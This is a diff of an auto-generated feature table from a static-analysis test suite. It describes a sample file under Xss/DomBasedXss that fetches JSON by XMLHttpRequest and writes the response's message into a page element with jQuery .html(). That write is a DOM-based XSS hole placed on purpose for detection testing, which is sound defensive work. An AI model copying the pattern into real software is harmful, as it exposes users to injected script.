autogenerated/Xss/DomBasedXss/xmlRequest.js:2:15:2:34 | new XMLHttpRequest() | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:19:2:32 | XMLHttpRequest | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:19:2:32 | XMLHttpRequest | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:19:2:32 | XMLHttpRequest | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:19:2:32 | XMLHttpRequest | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:2:19:2:32 | XMLHttpRequest | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:11 | url | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:11 | url | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:11 | url | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:11 | url | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:11 | url | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url = " ... url }}" | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url = " ... url }}" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url = " ... url }}" | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url = " ... url }}" | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:9:3:30 | url = " ... url }}" | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:15:3:30 | "{{ some_url }}" | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:15:3:30 | "{{ some_url }}" | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:15:3:30 | "{{ some_url }}" | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:15:3:30 | "{{ some_url }}" | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:3:15:3:30 | "{{ some_url }}" | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:7 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:7 | xhr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:7 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:7 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:7 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:12 | xhr.open | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:12 | xhr.open | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:12 | xhr.open | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:12 | xhr.open | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:12 | xhr.open | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | exceptional return of xhr.ope ... , true) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | exceptional return of xhr.ope ... , true) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | exceptional return of xhr.ope ... , true) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | exceptional return of xhr.ope ... , true) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | exceptional return of xhr.ope ... , true) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | xhr.ope ... , true) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | xhr.ope ... , true) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | xhr.ope ... , true) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | xhr.ope ... , true) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:5:4:30 | xhr.ope ... , true) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:9:4:12 | open | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:9:4:12 | open | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:9:4:12 | open | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:9:4:12 | open | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:4:9:4:12 | open | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:4:14:4:18 | "GET" | CalleeFlexibleAccessPath | xhr.open | | autogenerated/Xss/DomBasedXss/xmlRequest.js:4:14:4:18 | "GET" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:4:14:4:18 | "GET" | contextFunctionInterfaces | onreadystatechange() | @@ -18567,6 +126410,31 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:4:26:4:29 | true | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:4:26:4:29 | true | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:4:26:4:29 | true | receiverName | xhr | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:7 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:7 | xhr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:7 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:7 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:7 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:24 | xhr.setRequestHeader | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:24 | xhr.setRequestHeader | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:24 | xhr.setRequestHeader | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:24 | xhr.setRequestHeader | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:24 | xhr.setRequestHeader | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | exceptional return of xhr.set ... /json") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | exceptional return of xhr.set ... /json") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | exceptional return of xhr.set ... /json") | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | exceptional return of xhr.set ... /json") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | exceptional return of xhr.set ... /json") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | xhr.set ... /json") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | xhr.set ... /json") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | xhr.set ... /json") | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | xhr.set ... /json") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:5:5:60 | xhr.set ... /json") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:9:5:24 | setRequestHeader | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:9:5:24 | setRequestHeader | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:9:5:24 | setRequestHeader | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:9:5:24 | setRequestHeader | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:5:9:5:24 | setRequestHeader | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:5:26:5:39 | "Content-Type" | CalleeFlexibleAccessPath | xhr.setRequestHeader | | autogenerated/Xss/DomBasedXss/xmlRequest.js:5:26:5:39 | "Content-Type" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:5:26:5:39 | "Content-Type" | contextFunctionInterfaces | onreadystatechange() | @@ -18583,6 +126451,127 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:5:42:5:59 | "application/json" | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:5:42:5:59 | "application/json" | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:5:42:5:59 | "application/json" | receiverName | xhr | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:7 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:7 | xhr | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:7 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:7 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:7 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:26 | xhr.onr ... echange | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:26 | xhr.onr ... echange | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:26 | xhr.onr ... echange | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:26 | xhr.onr ... echange | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:6:26 | xhr.onr ... echange | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:10:5 | xhr.onr ... s\\n } | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:10:5 | xhr.onr ... s\\n } | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:10:5 | xhr.onr ... s\\n } | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:10:5 | xhr.onr ... s\\n } | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:5:10:5 | xhr.onr ... s\\n } | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:9:6:26 | onreadystatechange | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:9:6:26 | onreadystatechange | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:9:6:26 | onreadystatechange | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:9:6:26 | onreadystatechange | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:9:6:26 | onreadystatechange | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | this | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | this | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | this | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | this | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | xhr | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:6:29 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | 'arguments' object of anonymous function | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | 'arguments' object of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | 'arguments' object of anonymous function | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | exceptional return of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | exceptional return of anonymous function | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | exceptional return of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | exceptional return of anonymous function | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | functio ... s\\n } | assignedToPropName | onreadystatechange | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | functio ... s\\n } | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | functio ... s\\n } | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | functio ... s\\n } | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | functio ... s\\n } | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | functio ... s\\n } | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | return of anonymous function | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | return of anonymous function | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | return of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:6:30:10:5 | return of anonymous function | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:15 | xhr | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:15 | xhr | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:15 | xhr | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:15 | xhr | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:15 | xhr | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:26 | xhr.readyState | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:26 | xhr.readyState | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:26 | xhr.readyState | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:26 | xhr.readyState | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:26 | xhr.readyState | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:32 | xhr.readyState !== 4 | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:32 | xhr.readyState !== 4 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:32 | xhr.readyState !== 4 | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:32 | xhr.readyState !== 4 | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:13:7:32 | xhr.readyState !== 4 | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:17:7:26 | readyState | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:17:7:26 | readyState | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:17:7:26 | readyState | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:17:7:26 | readyState | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:17:7:26 | readyState | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:32:7:32 | 4 | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:32:7:32 | 4 | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:32:7:32 | 4 | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:32:7:32 | 4 | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:7:32:7:32 | 4 | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:16 | json | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:16 | json | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:16 | json | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:16 | json | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:16 | json | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json = ... seText) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json = ... seText) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json = ... seText) | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json = ... seText) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:13:8:47 | json = ... seText) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:23 | JSON | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:23 | JSON | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:23 | JSON | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:23 | JSON | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:23 | JSON | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:29 | JSON.parse | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:29 | JSON.parse | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:29 | JSON.parse | enclosingFunctionBody | xhr XMLHttpRequest url {{ some_url }} xhr open GET url true xhr setRequestHeader Content-Type application/json xhr onreadystatechange xhr readyState 4 json JSON parse xhr responseText $ #myThing html json message xhr send error console log error | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:29 | JSON.parse | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:29 | JSON.parse | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | JSON.pa ... seText) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:8:20:8:47 | 